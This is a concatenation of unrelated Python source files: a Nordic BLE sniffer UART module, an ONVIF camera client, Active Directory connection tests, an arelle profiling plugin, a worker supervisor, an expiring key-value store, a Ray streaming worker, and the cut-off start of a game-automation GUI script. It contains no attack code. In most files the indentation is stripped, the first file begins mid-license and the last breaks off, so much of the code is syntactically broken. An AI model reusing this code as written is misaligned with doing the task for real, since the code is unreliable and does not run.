# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY, AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL NORDIC
# SEMICONDUCTOR ASA OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.
import collections
import logging
import serial
from threading import Thread, Event
import serial.tools.list_ports as list_ports
import Exceptions
import Packet
SNIFFER_OLD_DEFAULT_BAUDRATE = 460800
# Baudrates that should be tried (add more if required)
SNIFFER_BAUDRATES = [1000000, 460800]
def find_sniffer(write_data=False):
open_ports = list_ports.comports()
sniffers = []
for port in [x.device for x in open_ports]:
for rate in SNIFFER_BAUDRATES:
reader = None
try:
reader = Packet.PacketReader(portnum=port, baudrate=rate)
try:
if write_data:
reader.sendPingReq()
_ = reader.decodeFromSLIP(0.1, complete_timeout=0.1)
else:
_ = reader.decodeFromSLIP(0.3, complete_timeout=0.3)
# FIXME: Should add the baud rate here, but that will be a breaking change
sniffers.append(port.encode('ascii', 'ignore'))
break
except (Exceptions.SnifferTimeout, Exceptions.UARTPacketError):
pass
except (serial.SerialException, ValueError):
continue
finally:
if reader is not None:
reader.doExit()
return sniffers
def find_sniffer_baudrates(port):
for rate in SNIFFER_BAUDRATES:
reader = None
try:
reader = Packet.PacketReader(portnum=port, baudrate=rate)
try:
reader.sendPingReq()
_ = reader.decodeFromSLIP(0.1, complete_timeout=0.1)
# TODO: possibly include additional rates based on protocol version
return {"default": rate, "other": []}
except (Exceptions.SnifferTimeout, Exceptions.UARTPacketError):
pass
finally:
if reader is not None:
reader.doExit()
return None
class Uart:
def __init__(self, portnum=None, baudrate=None):
self.ser = None
try:
if baudrate is not None and baudrate not in SNIFFER_BAUDRATES:
raise Exception("Invalid baudrate: " + str(baudrate))
self.ser = serial.Serial(
port=portnum,
baudrate=9600,
rtscts=True
)
self.ser.baudrate = baudrate
except Exception as e:
if self.ser:
self.ser.close()
self.ser = None
raise
self.read_queue = collections.deque()
self.read_queue_has_data = Event()
self.worker_thread = Thread(target=self._read_worker)
self.reading = True
        self.worker_thread.daemon = True
self.worker_thread.start()
def _read_worker(self):
self.ser.reset_input_buffer()
while self.reading:
try:
# Read any data available, or wait for at least one byte
data_read = self.ser.read(self.ser.in_waiting or 1)
self._read_queue_extend(data_read)
except serial.SerialException as e:
logging.info("Unable to read UART: %s" % e)
self.reading = False
return
def close(self):
if self.ser:
logging.info("closing UART")
self.reading = False
# Wake any threads waiting on the queue
self.read_queue_has_data.set()
if hasattr(self.ser, "cancel_read"):
self.ser.cancel_read()
self.worker_thread.join()
self.ser.close()
else:
self.ser.close()
self.worker_thread.join()
self.ser = None
def __del__(self):
self.close()
def switchBaudRate(self, newBaudRate):
self.ser.baudrate = newBaudRate
def readByte(self, timeout=None):
return self._read_queue_get(timeout)
def writeList(self, array):
try:
self.ser.write(array)
except serial.SerialTimeoutException:
logging.info("Got write timeout, ignoring error")
except serial.SerialException as e:
self.ser.close()
raise e
def _read_queue_extend(self, data):
if len(data) > 0:
self.read_queue.extend(data)
self.read_queue_has_data.set()
def _read_queue_get(self, timeout=None):
data = None
if self.read_queue_has_data.wait(timeout):
self.read_queue_has_data.clear()
try:
data = self.read_queue.popleft()
except IndexError:
# This will happen when the class is destroyed
return None
if len(self.read_queue) > 0:
self.read_queue_has_data.set()
return data
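# A minimal usage sketch of the Uart class (the port name is an assumption
# used for illustration only):
#
#   uart = Uart(portnum="/dev/ttyACM0", baudrate=1000000)
#   byte = uart.readByte(timeout=1.0)   # returns None on timeout
#   uart.writeList(b"\x01\x02\x03")
#   uart.close()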
def list_serial_ports():
# Scan for available ports.
return list_ports.comports()
# Convert a list of ints (bytes) into an ASCII string
def listToString(values):
    return "".join(chr(i) for i in values)
# Convert an ASCII string into a list of ints (bytes)
def stringToList(text):
    return [ord(c) for c in text]
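# Example round trip: stringToList("Hi") == [72, 105] and
# listToString([72, 105]) == "Hi".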
if __name__ == "__main__":
import time
t_start = time.time()
s = find_sniffer()
tn = time.time()
    print(s)
    print("find_sniffer took %f seconds" % (tn - t_start))
    for p in s:
        t = time.time()
        print(find_sniffer_baudrates(p))
        tn = time.time()
        print("find_sniffer_baudrate took %f seconds" % (tn - t))
    tn = time.time()
    print("total runtime %f" % (tn - t_start))
|
client.py
|
from __future__ import print_function, division
__version__ = '0.0.1'
import datetime as dt
import logging
import os.path
from threading import Thread, RLock
from zeep.client import Client, CachingClient, Settings
from zeep.wsse.username import UsernameToken
import zeep.helpers
from onvif.exceptions import ONVIFError
from onvif.definition import SERVICES
logger = logging.getLogger('onvif')
logging.basicConfig(level=logging.INFO)
logging.getLogger('zeep.client').setLevel(logging.CRITICAL)
import zeep
def zeep_pythonvalue(self, xmlvalue):
return xmlvalue
zeep.xsd.simple.AnySimpleType.pythonvalue = zeep_pythonvalue
# Ensure wrapped methods raise an ONVIFError exception
# when something goes wrong
def safe_func(func):
def wrapped(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as err:
raise ONVIFError(err)
return wrapped
class UsernameDigestTokenDtDiff(UsernameToken):
"""
    UsernameDigestToken class, with an adjustable time offset parameter.
    This allows authentication on cameras that are not time synchronized.
    Please note that using NTP on both ends is the recommended solution;
    this offset should only be used in "safe" environments.
"""
def __init__(self, user, passw, dt_diff=None, **kwargs):
super().__init__(user, passw, **kwargs)
self.dt_diff = dt_diff # Date/time difference in datetime.timedelta
def apply(self, envelope, headers):
old_created = self.created
if self.created is None:
self.created = dt.datetime.utcnow()
if self.dt_diff is not None:
self.created += self.dt_diff
result = super().apply(envelope, headers)
self.created = old_created
return result
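# A minimal sketch of how dt_diff can be derived (variable names are
# illustrative, not part of this module):
#
#   camera_now = ...  # e.g. parsed from the device's GetSystemDateAndTime()
#   dt_diff = camera_now - dt.datetime.utcnow()
#   wsse = UsernameDigestTokenDtDiff('admin', 'secret', dt_diff=dt_diff)
#
# The WS-Security Created timestamp is then shifted by dt_diff so a camera
# with a skewed clock still accepts the digest.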
class ONVIFService(object):
"""
    Python implementation of an ONVIF service.
Services List:
DeviceMgmt DeviceIO Event AnalyticsDevice Display Imaging Media
PTZ Receiver RemoteDiscovery Recording Replay Search Extension
>>> from onvif import ONVIFService
>>> device_service = ONVIFService('http://192.168.0.112/onvif/device_service',
... 'admin', 'foscam',
... '/etc/onvif/wsdl/devicemgmt.wsdl')
>>> ret = device_service.GetHostname()
    >>> print(ret.FromDHCP)
    >>> print(ret.Name)
    >>> device_service.SetHostname(dict(Name='newhostname'))
    >>> ret = device_service.GetSystemDateAndTime()
    >>> print(ret.DaylightSavings)
    >>> print(ret.TimeZone)
    >>> dict_ret = device_service.to_dict(ret)
    >>> print(dict_ret['TimeZone'])
    There are two ways to pass parameters to service methods:
1. Dict
params = {'Name': 'NewHostName'}
device_service.SetHostname(params)
2. Type Instance
params = device_service.create_type('SetHostname')
params.Hostname = 'NewHostName'
device_service.SetHostname(params)
"""
@safe_func
def __init__(self, xaddr, user, passwd, url,
encrypt=True, daemon=False, zeep_client=None, no_cache=False,
dt_diff=None, binding_name='', transport=None):
if not os.path.isfile(url):
            raise ONVIFError('%s does not exist!' % url)
self.url = url
self.xaddr = xaddr
wsse = UsernameDigestTokenDtDiff(user, passwd, dt_diff=dt_diff, use_digest=encrypt)
# Create soap client
if not zeep_client:
ClientType = Client if no_cache else CachingClient
settings = Settings()
settings.strict = False
settings.xml_huge_tree = True
self.zeep_client = ClientType(wsdl=url, wsse=wsse, transport=transport, settings=settings)
else:
self.zeep_client = zeep_client
self.ws_client = self.zeep_client.create_service(binding_name, self.xaddr)
# Set soap header for authentication
self.user = user
self.passwd = passwd
        # Indicate whether a password digest is needed
self.encrypt = encrypt
self.daemon = daemon
self.dt_diff = dt_diff
self.create_type = lambda x: self.zeep_client.get_element('ns0:' + x)()
@classmethod
@safe_func
def clone(cls, service, *args, **kwargs):
clone_service = service.ws_client.clone()
kwargs['ws_client'] = clone_service
return ONVIFService(*args, **kwargs)
@staticmethod
@safe_func
def to_dict(zeepobject):
# Convert a WSDL Type instance into a dictionary
return {} if zeepobject is None else zeep.helpers.serialize_object(zeepobject)
def service_wrapper(self, func):
@safe_func
def wrapped(params=None, callback=None):
def call(params=None, callback=None):
# No params
# print(params.__class__.__mro__)
if params is None:
params = {}
else:
params = ONVIFService.to_dict(params)
try:
ret = func(**params)
except TypeError:
ret = func(params)
if callable(callback):
callback(ret)
return ret
if self.daemon:
th = Thread(target=call, args=(params, callback))
th.daemon = True
th.start()
else:
return call(params, callback)
return wrapped
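    # Illustrative calls through the wrapper (names taken from the docstring example above):
    #   device_service.GetHostname()                # synchronous; returns the zeep result
    #   device_service.GetHostname(callback=print)  # with daemon=True the call runs in a
    #                                               # background thread and the result is
    #                                               # handed to the callback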
def __getattr__(self, name):
"""
Call the real onvif Service operations,
See the official wsdl definition for the
APIs detail(API name, request parameters,
response parameters, parameter types, etc...)
"""
builtin = name.startswith('__') and name.endswith('__')
if builtin:
return self.__dict__[name]
else:
return self.service_wrapper(getattr(self.ws_client, name))
class ONVIFCamera(object):
"""
    Python Implementation of an ONVIF compliant device.
    This class integrates the ONVIF services.
    The adjust_time parameter allows authentication on cameras that are not time synchronized.
    Please note that using NTP on both ends is the recommended solution;
    this should only be used in "safe" environments.
    Also, this cannot be used on AXIS cameras, as every request is authenticated, contrary to the ONVIF standard.
>>> from onvif import ONVIFCamera
>>> mycam = ONVIFCamera('192.168.0.112', 80, 'admin', '12345')
>>> mycam.devicemgmt.GetServices(False)
>>> media_service = mycam.create_media_service()
>>> ptz_service = mycam.create_ptz_service()
# Get PTZ Configuration:
>>> ptz_service.GetConfiguration()
"""
# Class-level variables
services_template = {'devicemgmt': None, 'ptz': None, 'media': None,
'imaging': None, 'events': None, 'analytics': None}
use_services_template = {'devicemgmt': True, 'ptz': True, 'media': True,
'imaging': True, 'events': True, 'analytics': True}
def __init__(self, host, port, user, passwd,
wsdl_dir=os.path.join(os.path.dirname(os.path.dirname(__file__)),
"wsdl"),
encrypt=True, daemon=False, no_cache=False, adjust_time=False,
transport=None):
os.environ.pop('http_proxy', None)
os.environ.pop('https_proxy', None)
self.host = host
self.port = int(port)
self.user = user
self.passwd = passwd
self.wsdl_dir = wsdl_dir
self.encrypt = encrypt
self.daemon = daemon
self.no_cache = no_cache
self.adjust_time = adjust_time
self.transport = transport
# Active service client container
self.services = {}
self.services_lock = RLock()
# Set xaddrs
self.update_xaddrs()
self.to_dict = ONVIFService.to_dict
def update_xaddrs(self):
# Establish devicemgmt service first
self.dt_diff = None
self.devicemgmt = self.create_devicemgmt_service()
if self.adjust_time:
cdate = self.devicemgmt.GetSystemDateAndTime().UTCDateTime
cam_date = dt.datetime(cdate.Date.Year, cdate.Date.Month, cdate.Date.Day,
cdate.Time.Hour, cdate.Time.Minute, cdate.Time.Second)
self.dt_diff = cam_date - dt.datetime.utcnow()
self.devicemgmt.dt_diff = self.dt_diff
self.devicemgmt = self.create_devicemgmt_service()
# Get XAddr of services on the device
self.xaddrs = {}
capabilities = self.devicemgmt.GetCapabilities({'Category': 'All'})
for name in capabilities:
capability = capabilities[name]
try:
if name.lower() in SERVICES and capability is not None:
ns = SERVICES[name.lower()]['ns']
self.xaddrs[ns] = capability['XAddr']
except Exception:
logger.exception('Unexpected service type')
with self.services_lock:
try:
self.event = self.create_events_service()
self.xaddrs['http://www.onvif.org/ver10/events/wsdl/PullPointSubscription'] = \
self.event.CreatePullPointSubscription().SubscriptionReference.Address._value_1
except Exception:
pass
def update_url(self, host=None, port=None):
changed = False
if host and self.host != host:
changed = True
self.host = host
if port and self.port != port:
changed = True
self.port = port
if not changed:
return
self.devicemgmt = self.create_devicemgmt_service()
self.capabilities = self.devicemgmt.GetCapabilities()
with self.services_lock:
for sname in self.services.keys():
                xaddr = getattr(self.capabilities, sname.capitalize()).XAddr
self.services[sname].ws_client.set_options(location=xaddr)
def get_service(self, name, create=True):
service = getattr(self, name.lower(), None)
if not service and create:
return getattr(self, 'create_%s_service' % name.lower())()
return service
def get_definition(self, name, portType=None):
"""Returns xaddr and wsdl of specified service"""
# Check if the service is supported
if name not in SERVICES:
raise ONVIFError('Unknown service %s' % name)
wsdl_file = SERVICES[name]['wsdl']
ns = SERVICES[name]['ns']
binding_name = '{%s}%s' % (ns, SERVICES[name]['binding'])
if portType:
ns += '/' + portType
wsdlpath = os.path.join(self.wsdl_dir, wsdl_file)
if not os.path.isfile(wsdlpath):
raise ONVIFError('No such file: %s' % wsdlpath)
# XAddr for devicemgmt is fixed:
if name == 'devicemgmt':
xaddr = '%s:%s/onvif/device_service' % \
(self.host if (self.host.startswith('http://') or self.host.startswith('https://'))
else 'http://%s' % self.host, self.port)
return xaddr, wsdlpath, binding_name
# Get other XAddr
xaddr = self.xaddrs.get(ns)
if not xaddr:
raise ONVIFError("Device doesn't support service: %s" % name)
return xaddr, wsdlpath, binding_name
def create_onvif_service(self, name, portType=None, transport=None):
"""
Create ONVIF service client.
:param name: service name, should be present as a key within
the `SERVICES` dictionary declared within the `onvif.definition` module
:param portType:
:param transport:
:return:
"""
"""Create ONVIF service client"""
name = name.lower()
xaddr, wsdl_file, binding_name = self.get_definition(name, portType)
with self.services_lock:
if not transport:
transport = self.transport
service = ONVIFService(xaddr, self.user, self.passwd,
wsdl_file, self.encrypt,
self.daemon, no_cache=self.no_cache,
dt_diff=self.dt_diff,
binding_name=binding_name,
transport=transport)
self.services[name] = service
setattr(self, name, service)
if not self.services_template.get(name):
self.services_template[name] = service
return service
def create_devicemgmt_service(self, transport=None):
# The entry point for devicemgmt service is fixed.
return self.create_onvif_service('devicemgmt', transport=transport)
def create_media_service(self, transport=None):
return self.create_onvif_service('media', transport=transport)
def create_ptz_service(self, transport=None):
return self.create_onvif_service('ptz', transport=transport)
def create_imaging_service(self, transport=None):
return self.create_onvif_service('imaging', transport=transport)
def create_deviceio_service(self, transport=None):
return self.create_onvif_service('deviceio', transport=transport)
def create_events_service(self, transport=None):
return self.create_onvif_service('events', transport=transport)
def create_analytics_service(self, transport=None):
return self.create_onvif_service('analytics', transport=transport)
def create_recording_service(self, transport=None):
return self.create_onvif_service('recording', transport=transport)
def create_search_service(self, transport=None):
return self.create_onvif_service('search', transport=transport)
def create_replay_service(self, transport=None):
return self.create_onvif_service('replay', transport=transport)
def create_pullpoint_service(self, transport=None):
return self.create_onvif_service('pullpoint',
portType='PullPointSubscription',
transport=transport)
def create_receiver_service(self, transport=None):
return self.create_onvif_service('receiver', transport=transport)
def create_notification_service(self, transport=None):
return self.create_onvif_service('notification', transport=transport)
def create_subscription_service(self, transport=None):
return self.create_onvif_service('subscription', transport=transport)
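# Minimal usage sketch (host, port and credentials are illustrative placeholders):
#   cam = ONVIFCamera('192.168.0.112', 80, 'admin', '12345', adjust_time=True)
#   cam.devicemgmt.GetHostname()
#   media_service = cam.create_media_service()
#   ptz_service = cam.create_ptz_service()
#   ptz_service.GetConfiguration()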
|
connection_test.py
|
import demistomock as demisto
from Active_Directory_Query import main
import socket
import ssl
from threading import Thread
import time
BASE_TEST_PARAMS = {
'server_ip': '127.0.0.1',
'secure_connection': 'None',
'page_size': '500',
'credentials': {'identifier': 'bad', 'password': 'bad'}
}
RETURN_ERROR_TARGET = 'Active_Directory_Query.return_error'
def test_bad_host_no_ssl(mocker):
mocker.patch.object(demisto, 'params',
return_value=BASE_TEST_PARAMS)
return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
# validate our mock of params
assert demisto.params().get('server_ip') == '127.0.0.1'
main()
assert return_error_mock.call_count == 1
    # call_args holds the last call as a tuple of (args, kwargs)
err_msg = return_error_mock.call_args[0][0]
assert len(err_msg) < 100
assert 'Failed to access' in err_msg
def test_bad_ssl(mocker):
params = BASE_TEST_PARAMS.copy()
params['server_ip'] = '185.199.108.153' # disable-secrets-detection
params['secure_connection'] = 'SSL'
params['port'] = 443
mocker.patch.object(demisto, 'params',
return_value=params)
return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
# validate our mock of params
assert demisto.params().get('secure_connection') == 'SSL'
main()
assert return_error_mock.call_count == 1
    # call_args holds the last call as a tuple of (args, kwargs)
err_msg = return_error_mock.call_args[0][0]
assert len(err_msg) < 100
assert 'Failed to access' in err_msg
assert 'SSL error' in err_msg
def ssl_bad_socket_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# cert and keyfile generated with
# openssl req -x509 -nodes -days 3000 -newkey rsa:2048 -keyout key.pem -out cert.pem
context.load_cert_chain('cert.pem', 'key.pem')
with socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) as sock:
sock.bind(('127.0.0.1', 9636))
sock.listen(5)
with context.wrap_socket(sock, server_side=True) as ssock:
conn, addr = ssock.accept()
print("received connection from: {}".format(addr))
conn.recv(32)
msg = b'THIS IS A TEST SERVER WHICH IGNORES PROTOCOL\n\n'
for x in range(10):
msg += msg
conn.send(msg)
conn.shutdown(socket.SHUT_RDWR)
conn.close()
def test_faulty_server(mocker):
t = Thread(target=ssl_bad_socket_server)
t.start()
time.sleep(1) # wait for socket server to startup
params = BASE_TEST_PARAMS.copy()
params['server_ip'] = '127.0.0.1' # disable-secrets-detection
params['secure_connection'] = 'SSL'
params['unsecure'] = True
params['port'] = 9636
mocker.patch.object(demisto, 'params',
return_value=params)
return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
# validate our mock of params
assert demisto.params().get('secure_connection') == 'SSL'
main()
t.join(5)
assert return_error_mock.call_count == 1
    # call_args holds the last call as a tuple of (args, kwargs)
err_msg = return_error_mock.call_args[0][0]
assert len(err_msg) < 100
assert 'Failed to access' in err_msg
|
formulaProfiler.py
|
'''
This is an example of a plug-in to the GUI menu that profiles formula execution.
(c) Copyright 2012 Mark V Systems Limited, All rights reserved.
'''
import os
from tkinter import simpledialog, messagebox
def profileFormulaMenuEntender(cntlr, menu):
# Extend menu with an item for the profile formula plugin
menu.add_command(label="Profile formula validation",
underline=0,
command=lambda: profileFormulaMenuCommand(cntlr) )
def profileFormulaMenuCommand(cntlr):
    # profile formula menu item has been invoked
if cntlr.modelManager is None or cntlr.modelManager.modelXbrl is None:
cntlr.addToLog("No taxonomy loaded.")
return
# get file name into which to save log file while in foreground thread
profileReportFile = cntlr.uiFileDialog("save",
title=_("arelle - Save Formula Profile Report"),
initialdir=cntlr.config.setdefault("formulaProfileReportDir","."),
filetypes=[(_("Profile report file .log"), "*.log")],
defaultextension=".log")
if not profileReportFile:
return False
errMsg = ""
maxRunTime = 0
    while True:
        timeout = simpledialog.askstring(_("arelle - Set formula run time limit"),
                                         _("{0}You may enter the maximum number of minutes to run formulas.\n"
                                           "(Leave empty for no run time limitation.)".format(errMsg)),
                                         parent=cntlr.parent)
        if timeout:
            try:
                maxRunTime = float(timeout)
                break
            except ValueError as err:
                errMsg = str(err) + "\n\n"
        else:
            break  # empty or cancelled: no run time limitation
excludeCompileTime = messagebox.askyesno(_("arelle - Exclude formula compile statistics"),
_("Should formula compiling be excluded from the statistics?\n"
"(Yes will make a separate compiling \"pass\" so that statistics include execution only.)".format(errMsg)),
parent=cntlr.parent)
cntlr.config["formulaProfileReportDir"] = os.path.dirname(profileReportFile)
cntlr.saveConfig()
# perform validation and profiling on background thread
import threading
thread = threading.Thread(target=lambda c=cntlr, f=profileReportFile, t=maxRunTime, e=excludeCompileTime: backgroundProfileFormula(c,f,t,e))
thread.daemon = True
thread.start()
def backgroundProfileFormula(cntlr, profileReportFile, maxRunTime, excludeCompileTime):
from arelle import Locale, XPathParser, ValidateXbrlDimensions, ValidateFormula
# build grammar before profiling (if this is the first pass, so it doesn't count in profile statistics)
XPathParser.initializeParser(cntlr.modelManager)
# load dimension defaults
ValidateXbrlDimensions.loadDimensionDefaults(cntlr.modelManager)
import cProfile, pstats, sys, time
# a minimal validation class for formula validator parameters that are needed
class Validate:
def __init__(self, modelXbrl, maxRunTime):
self.modelXbrl = modelXbrl
self.parameters = None
self.validateSBRNL = False
self.maxFormulaRunTime = maxRunTime
def close(self):
self.__dict__.clear()
val = Validate(cntlr.modelManager.modelXbrl, maxRunTime)
formulaOptions = val.modelXbrl.modelManager.formulaOptions
if excludeCompileTime:
startedAt = time.time()
cntlr.addToLog(_("pre-compiling formulas before profiling"))
val.validateFormulaCompileOnly = True
ValidateFormula.validate(val)
del val.validateFormulaCompileOnly
cntlr.addToLog(Locale.format_string(cntlr.modelManager.locale,
_("formula pre-compiling completed in %.2f secs"),
time.time() - startedAt))
cntlr.addToLog(_("executing formulas for profiling"))
else:
cntlr.addToLog(_("compiling and executing formulas for profiling"))
startedAt = time.time()
statsFile = profileReportFile + ".bin"
cProfile.runctx("ValidateFormula.validate(val)", globals(), locals(), statsFile)
cntlr.addToLog(Locale.format_string(cntlr.modelManager.locale,
_("formula profiling completed in %.2f secs"),
time.time() - startedAt))
# dereference val
val.close()
# specify a file for log
priorStdOut = sys.stdout
sys.stdout = open(profileReportFile, "w")
statObj = pstats.Stats(statsFile)
statObj.strip_dirs()
statObj.sort_stats("time")
statObj.print_stats()
statObj.print_callees()
statObj.print_callers()
sys.stdout.flush()
sys.stdout.close()
del statObj
sys.stdout = priorStdOut
os.remove(statsFile)
__pluginInfo__ = {
'name': 'Profile Formula Validation',
'version': '1.0',
'description': "This plug-in adds a profiled formula validation. "
"Includes XPath compilation in the profile if it is the first validation of instance; "
"to exclude XPath compile statistics, validate first the normal way (e.g., toolbar button) "
"and then validate again using this profile formula validation plug-in. ",
'license': 'Apache-2',
'author': 'Mark V Systems Limited',
'copyright': '(c) Copyright 2012 Mark V Systems Limited, All rights reserved.',
# classes of mount points (required)
'CntlrWinMain.Menu.Validation': profileFormulaMenuEntender,
}
|
supervisor.py
|
import multiprocessing
import os
import signal
import time
import sys
import setproctitle
import psutil
from dagger.logger import logger
HANDLED_SIGNALS = (
signal.SIGINT,
signal.SIGTERM,
)
__all__ = ("Supervisor",)
class Supervisor:
def __init__(self, target, args=(), kwargs=None, name=None, worker_memory_limit=0):
self.target = target
self.args = args
self.kwargs = kwargs if kwargs is not None else {}
self.name = name
self.should_exit = False
self.worker_memory_limit = worker_memory_limit
def handle_exit(self, sig, frame):
self.should_exit = True
def _run(self, *args, **kwargs):
self._set_process_name(False)
try:
self.target(*args, **kwargs)
except Exception as exc:
logger.exception("worker [%d] got uncaught error %r", os.getpid(), exc)
sys.exit(1)
def start(self, workers=1):
logger.info("Started master process [%d]", os.getpid())
self._set_process_name(True)
for sig in HANDLED_SIGNALS:
signal.signal(sig, self.handle_exit)
processes = []
args = self.args
kwargs = self.kwargs
try:
for idx in range(workers):
process = multiprocessing.Process(target=self._run, args=args, kwargs=kwargs)
process.start()
processes.append(process)
max_memory_allowed = self.worker_memory_limit
while not self.should_exit:
if not processes:
break
for i in range(len(processes)):
process = processes[i]
if not process.is_alive():
process.join()
del processes[i]
break
if not max_memory_allowed:
continue
pid = process.pid
process = psutil.Process(pid)
mem = process.memory_info()
if mem.rss > max_memory_allowed: # bytes
os.kill(pid, signal.SIGINT)
logger.warning("%s worker killed because memory overflowed", process)
process = multiprocessing.Process(target=self._run, args=args, kwargs=kwargs)
process.start()
processes.append(process)
time.sleep(0.1)
finally:
logger.info("Stopping master process [%d]", os.getpid())
for process in processes:
process.terminate()
for process in processes:
process.join()
logger.info("Exit master process [%d]", os.getpid())
def _set_process_name(self, master: bool = False) -> bool:
name = self.name
if not name:
return False
if callable(name):
name = name()
suffix = "[master]" if master else "[worker]"
name += suffix
setproctitle.setproctitle(name)
return True
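# Minimal usage sketch (handle_jobs is a made-up placeholder, not part of the package):
# fork two workers, restart any worker whose RSS grows past ~256 MiB, and shut everything
# down on SIGINT/SIGTERM.
if __name__ == "__main__":
    def handle_jobs(queue_name):
        while True:  # stand-in for real work
            time.sleep(1)
    supervisor = Supervisor(target=handle_jobs, args=("jobs",), name="dagger-demo",
                            worker_memory_limit=256 * 1024 * 1024)
    supervisor.start(workers=2)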
|
kv_storage.py
|
#!/bin/python3
import time
import threading
import random
def check(pool, times=20, maxCount=5):
    # Probabilistic expiry sweep: sample `times` keys that carry an expiry and let
    # pool.get() evict the stale ones; keep sweeping while at least `maxCount` of the
    # sampled keys turned out to be expired (i.e. while the expired ratio stays high).
    while len(pool.expire) >= times:
        count = 0
        for k in random.sample(list(pool.expire), times):
            if not pool.get(k):
                count += 1
        if count < maxCount:
            break
def expireTest(pool, cycle):
try:
while pool:
check(pool)
time.sleep(cycle)
except NameError:
pass
finally:
del pool
class Pool:
def __init__(self, *, checkCycle=10):
self.alive = True
self.__pool = {}
self.expire = {}
t = threading.Thread(target=lambda: expireTest(self, checkCycle))
t.daemon = True
t.start()
def get(self, key):
if self.expire.get(key) and self.expire[key] <= int(time.time()):
self.delete(key)
return None
return self.__pool.get(key)
def set(self, key, value, *, expire: int = None):
self.__pool[key] = value
if expire:
self.expire[key] = int(time.time()) + expire
elif self.expire.get(key):
self.expire.pop(key)
def delete(self, key):
if self.expire.get(key):
self.expire.pop(key)
if self.__pool.get(key):
return bool(self.__pool.pop(key))
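# Minimal usage sketch (illustrative only): entries set with `expire=N` stop being returned
# after N seconds; they are evicted lazily on get(), and the background sweeper handles
# bulk expiry once enough expiring keys exist.
if __name__ == "__main__":
    pool = Pool(checkCycle=1)
    pool.set("greeting", "hello")
    pool.set("token", "abc123", expire=2)
    print(pool.get("token"))     # -> 'abc123'
    time.sleep(3)
    print(pool.get("token"))     # -> None, the entry has expired
    print(pool.get("greeting"))  # -> 'hello', no expiry was set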
|
jobworker.py
|
import logging
import pickle
import threading
import ray
import ray.streaming._streaming as _streaming
from ray.streaming.config import Config
from ray.function_manager import FunctionDescriptor
from ray.streaming.communication import DataInput, DataOutput
logger = logging.getLogger(__name__)
@ray.remote
class JobWorker:
"""A streaming job worker.
    Attributes:
        worker_id: The id of the instance.
        operator: The operator that this worker instance runs.
        input_channels: The input channels of the instance, managed by an
            input gate (see: DataInput in communication.py).
        output_channels: The output channels of the instance, managed by an
            output gate (see: DataOutput in communication.py).
    """
def __init__(self, worker_id, operator, input_channels, output_channels):
self.env = None
self.worker_id = worker_id
self.operator = operator
processor_name = operator.processor_class.__name__
processor_instance = operator.processor_class(operator)
self.processor_name = processor_name
self.processor_instance = processor_instance
self.input_channels = input_channels
self.output_channels = output_channels
self.input_gate = None
self.output_gate = None
self.reader_client = None
self.writer_client = None
def init(self, env):
"""init streaming actor"""
env = pickle.loads(env)
self.env = env
logger.info("init operator instance %s", self.processor_name)
if env.config.channel_type == Config.NATIVE_CHANNEL:
core_worker = ray.worker.global_worker.core_worker
reader_async_func = FunctionDescriptor(
__name__, self.on_reader_message.__name__,
self.__class__.__name__)
reader_sync_func = FunctionDescriptor(
__name__, self.on_reader_message_sync.__name__,
self.__class__.__name__)
self.reader_client = _streaming.ReaderClient(
core_worker, reader_async_func, reader_sync_func)
writer_async_func = FunctionDescriptor(
__name__, self.on_writer_message.__name__,
self.__class__.__name__)
writer_sync_func = FunctionDescriptor(
__name__, self.on_writer_message_sync.__name__,
self.__class__.__name__)
self.writer_client = _streaming.WriterClient(
core_worker, writer_async_func, writer_sync_func)
if len(self.input_channels) > 0:
self.input_gate = DataInput(env, self.input_channels)
self.input_gate.init()
if len(self.output_channels) > 0:
self.output_gate = DataOutput(
env, self.output_channels,
self.operator.partitioning_strategies)
self.output_gate.init()
logger.info("init operator instance %s succeed", self.processor_name)
return True
# Starts the actor
def start(self):
self.t = threading.Thread(target=self.run, daemon=True)
self.t.start()
actor_id = ray.worker.global_worker.actor_id
logger.info("%s %s started, actor id %s", self.__class__.__name__,
self.processor_name, actor_id)
def run(self):
logger.info("%s start running", self.processor_name)
self.processor_instance.run(self.input_gate, self.output_gate)
logger.info("%s finished running", self.processor_name)
self.close()
def close(self):
if self.input_gate:
self.input_gate.close()
if self.output_gate:
self.output_gate.close()
def is_finished(self):
return not self.t.is_alive()
def on_reader_message(self, buffer: bytes):
"""used in direct call mode"""
self.reader_client.on_reader_message(buffer)
def on_reader_message_sync(self, buffer: bytes):
"""used in direct call mode"""
if self.reader_client is None:
return b" " * 4 # special flag to indicate this actor not ready
result = self.reader_client.on_reader_message_sync(buffer)
return result.to_pybytes()
def on_writer_message(self, buffer: bytes):
"""used in direct call mode"""
self.writer_client.on_writer_message(buffer)
def on_writer_message_sync(self, buffer: bytes):
"""used in direct call mode"""
if self.writer_client is None:
return b" " * 4 # special flag to indicate this actor not ready
result = self.writer_client.on_writer_message_sync(buffer)
return result.to_pybytes()
|
gui.py
|
# -*- coding:utf-8 -*-
# Author: HYL
# Date: 2021-11-17
import time
from tkinter import Tk, Button
import threading
import uiautomator2 as u2
print('欢迎使用烟雨江湖脚本,本脚本禁止商用。')
print("初始位置在泰山马车处,需要有马车票,使用前请先检查是否有马车票")
class MainWindow(Tk):
"""继承Tk,实例化窗口"""
def __init__(self):
super().__init__()
self.title('烟雨江湖脚本')
self.geometry('300x300+20+20')
print('初始化脚本界面')
self.main_event()
